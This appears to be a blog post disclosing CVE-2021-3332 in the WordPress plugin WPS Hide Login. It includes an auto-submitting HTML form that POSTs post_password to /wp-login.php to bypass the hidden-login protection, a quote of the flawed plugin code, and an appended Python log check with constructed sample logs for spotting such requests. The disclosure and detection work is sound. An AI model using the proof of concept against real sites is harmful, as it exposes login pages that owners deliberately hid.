Sebastian's Blog

software developer. security enthusiast.

Security

WPS Hide Login 1.6.1 Protection Bypass (CVE-2021-3332)

Sebastian

The protective feature of WPS Hide Login can be bypassed by sending a crafted POST request containing the field post_password to the default WordPress login URL /wp-login.php.

<form id="form" method="post" action="https://blog.sebastianschmitt.eu/wp-login.php">
	<input type="hidden" name="post_password"/>
</form>

<script>
window.onload = function(){
  document.forms['form'].submit();
}
</script>

In file /classes/plugin.php on line 494 the plugin explicitly checks for the absence of this POST field, but no else-case is defined: a request that carries post_password never reaches the guard that hides the login page.

    public function wp_loaded() {

        global $pagenow;

        $request = parse_url( rawurldecode( $_SERVER['REQUEST_URI'] ) );

        // The guard below only runs when post_password is absent; there is no else branch,
        // so a request that includes the field skips the check entirely.
        if ( ! isset( $_POST['post_password'] ) ) {

            if ( is_admin() && ! is_user_logged_in() && ! defined( 'DOING_AJAX' ) && $pagenow !== 'admin-post.php' && $request['path'] !== '/wp-admin/options.php' ) {

                // remainder of the method is not quoted in the post
            }
        }
    }
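A log-side check for this bug, added here as an example and not part of the original post or of the plugin: once the login slug has been renamed, the only legitimate POST to the default /wp-login.php is the password-protected-post form, which WordPress submits to wp-login.php?action=postpass (the reason the plugin exempts post_password in the first place). Anything else POSTed to the bare path is flagged. The access-log lines and the login slug are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined log format; only ip, timestamp, method, target and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

DEFAULT_LOGIN_PATH = "/wp-login.php"
# Assumption: with the login slug renamed, the only legitimate POST to the
# default path is the password-protected-post form (wp-login.php?action=postpass).
ALLOWED_ACTIONS = {"postpass"}

def parse_line(line):
    """Return a dict for one combined-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry.pop("target"))
    entry["path"] = parts.path
    entry["action"] = parse_qs(parts.query).get("action", [None])[0]
    entry["status"] = int(entry["status"])
    return entry

def is_bypass_candidate(entry):
    """POST to the default login URL that is not the allowed postpass flow."""
    return (entry["method"] == "POST"
            and entry["path"] == DEFAULT_LOGIN_PATH
            and entry["action"] not in ALLOWED_ACTIONS)

def find_bypass_candidates(lines):
    """Parse each line and keep the entries that look like a hide-login bypass."""
    return [e for e in map(parse_line, lines) if e and is_bypass_candidate(e)]

# Constructed sample log (not real traffic): a GET probe the plugin blocked, a bare
# POST that was served the login form, a visit to the renamed slug, a legitimate
# postpass submission.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Jan/2021:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 404 1234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [26/Jan/2021:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 5678 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [26/Jan/2021:10:00:03 +0000] "GET /my-login-slug/ HTTP/1.1" 200 5678 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [26/Jan/2021:10:00:04 +0000] "POST /wp-login.php?action=postpass HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_bypass_candidates(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} POST {hit["path"]} -> {hit["status"]}')
```

The status code is reported rather than matched on, because what the plugin answers on a blocked hit depends on its redirect setting; the bare POST to the default path is the signal.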
